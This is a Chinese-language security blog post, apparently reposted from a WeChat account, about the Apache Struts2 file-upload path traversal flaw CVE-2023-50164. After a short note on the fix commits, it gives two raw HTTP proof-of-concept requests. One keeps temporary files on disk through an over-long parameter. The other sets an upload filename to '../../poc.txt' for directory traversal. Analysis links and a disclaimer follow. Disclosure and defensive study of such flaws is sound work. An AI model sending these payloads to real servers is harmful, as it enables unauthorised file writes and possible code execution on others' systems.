Apache Struts2 CVE-2023-50164
漏洞描述里提到可通过伪造文件上传的参数导致目录穿越,看版本比对,有两个 Commit 引起我的关注,一个是 Always delete uploaded file,另一个是 Makes HttpParameters case-insensitive。前者的作用是确保上传的临时文件被正确上传,在修复之前,通过构造超长的文件上传参数可以让临时文件继续留存在磁盘中;
POC:
POST /s2_066_war_exploded/upload.action HTTP/1.1Host: localhost:8080Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlipContent-Length: 593------WebKitFormBoundary5WJ61X4PRwyYKlipContent-Disposition: form-data; name="upload"; filename="poc.txt"Content-Type: text/plaintest------WebKitFormBoundary5WJ61X4PRwyYKlipContent-Disposition: form-data; name="caption";{{randstr(4097,4097)}}------WebKitFormBoundary5WJ61X4PRwyYKlip--
POST /s2_066_war_exploded/upload.action HTTP/1.1Host: localhost:8080Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlipContent-Length: 593------WebKitFormBoundary5WJ61X4PRwyYKlipContent-Disposition: form-data; name="upload"; filename="poc.txt"Content-Type: text/plaintest------WebKitFormBoundary5WJ61X4PRwyYKlipContent-Disposition: form-data; name="uploadFileName";../../poc.txt------WebKitFormBoundary5WJ61X4PRwyYKlip--
漏洞复现分析
https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)
https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%86%E6%9E%90-S2-066/
poc
原文始发于微信公众号(Ots安全):Apache Struts2 CVE-2023-50164 POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论